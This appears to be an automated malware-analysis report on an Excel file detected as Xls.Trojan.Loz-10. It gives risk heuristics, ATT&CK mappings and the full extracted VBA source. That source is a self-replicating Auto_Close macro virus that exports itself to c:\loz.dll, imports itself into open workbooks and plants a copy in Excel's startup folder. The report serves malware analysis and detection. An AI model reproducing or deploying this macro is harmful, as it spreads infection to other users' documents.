MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document containing VBA macros, specifically an Auto_Close macro. This macro attempts to export a component named 'IT' to 'c:\loz.dll' and then imports this DLL into the current workbook and potentially a new workbook saved in the Application.StartupPath. The ClamAV detection 'Xls.Trojan.Loz-10' strongly suggests malicious intent, likely involving the execution of the dropped DLL.
Heuristics 2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2743 bytes |
SHA-256: e8ba362007cac05a59b32e3438da320ba8ee4b1947b3fa87c6c3d198b287df27 |
|||
|
Detection
ClamAV:
Xls.Trojan.Loz-10
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Tento_sešit"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Auto_Close()
'ŕęňčâŕöč˙ ďđč çŕęđűňčč äîęóěĺíňîâ
On Error Resume Next
If Dir(Application.StartupPath + "\" & Application.UserName & ".xlm") = Application.UserName & ".xlm" Then p = True
'ďđîâĺđ˙ĺě ĺńňü ëč íŕřŕ ęîďč˙ â startup ęŕňŕëîăĺ
Application.VBE.ActiveVBProject.VBComponents("IT").Export "c:\loz.dll"
'ĺńëč ôŕéë íŕéäĺí â startup ęŕňŕëîăĺ ňî ýęńďîđňčđóĺě ęîä â ôŕéë c:\loz.dll
For I = 1 To ActiveWorkbook.VBProject.VBComponents.Count
If ActiveWorkbook.VBProject.VBComponents(I).Name = "LMD" Then t = True
'ďđîâĺđ˙ĺě ĺńëč â äîęóěĺíňĺ íŕř ěîäóëü
Next I
If t = False Then
'ĺńëč íĺň
With ActiveWorkbook.VBProject
With .VBComponents.Import("c:\loz.dll")
'ňî čěďîđňčđóĺě ęîä čç ôŕéëŕ "c:\loz.dll"
End With
End With
End If
If p = False Then
'ĺńëč â startup ęŕňŕëîăĺ íĺň ęîďčé íŕřĺăî ęîäŕ
Workbooks.Add.SaveAs Filename:=Application.StartupPath + "\" & Application.UserName & ".xlm"
'ńîçäŕĺě ďóńňîé äîęóěĺíň â startup ęŕňŕëîăĺ
With ActiveWorkbook.VBProject
With .VBComponents.Import("c:\loz.dll")
'č âíĺäđ˙ĺěń˙ â ńîçäŕíűé äîęóěĺíň
End With
End With
Workbooks(Application.UserName & ".xlm").Save
'ńîőđŕíčě äîęóěĺíň â startup ęŕňŕëîăĺ
End If
ActiveWorkbook.Save
'ńîőđŕíčě ŕęňčâíűé äîęóěĺíň
End Sub
Attribute VB_Name = "List1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "List2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "List3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.